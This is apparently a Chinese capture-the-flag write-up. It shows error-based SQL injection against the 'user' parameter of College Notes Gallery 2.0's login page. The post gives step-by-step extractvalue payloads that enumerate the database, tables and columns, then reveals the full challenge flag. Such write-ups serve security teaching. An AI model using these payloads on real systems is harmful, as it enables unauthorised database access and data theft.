有登陆界面,先看看登陆界面
一进来就发现有报错,可能存在报错注入,尝试一下
判断闭合方式为单引号闭合
College Notes Gallery 2.0 允许通过“/notes/login.php”中的参数'user'进行 SQL 注入
构造paload 报错注入查询库名
1' and 1=extractvalue(1,concat(0x7e,(select database()))) --+
(蓝色部分为函数,黄色部分为拼接命令,绿色部分是ascii码转换的 ~
红色部分为所查询的部分)
构造paload 报错注入查询表名
1' and 1=extractvalue(1,concat(0x7e,(select group_concat(table_name) from
information_schema.tables where table_schema='notes'))) --+
构造paload 报错注入查询列名
1' and 1=extractvalue(1,concat(0x7e,(select group_concat(column_name) from
information_schema.columns where table_schema='notes' and table_name='flllaaaag'))) --+
构造paload 报错注入查询flag
flag前二十个字符
1' and 1=extractvalue(1,concat(0x7e,(select substr(group_concat(flag),1,20) from flllaaaag))) --+
因为extractvalue函数一次性只能默认返回32个字符,所以需要substr函数去指定从第几个字符开始显示,显示到第几个字符,当然最多还是只能返回32个字符
flag后二十个字符
1' and 1=extractvalue(1,concat(0x7e,(select substr(group_concat(flag),20,40) from flllaaaag))) --+
拼接得到flag:flag{a2fa747c-066c-4adf-b689-4c5111b1d476}
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
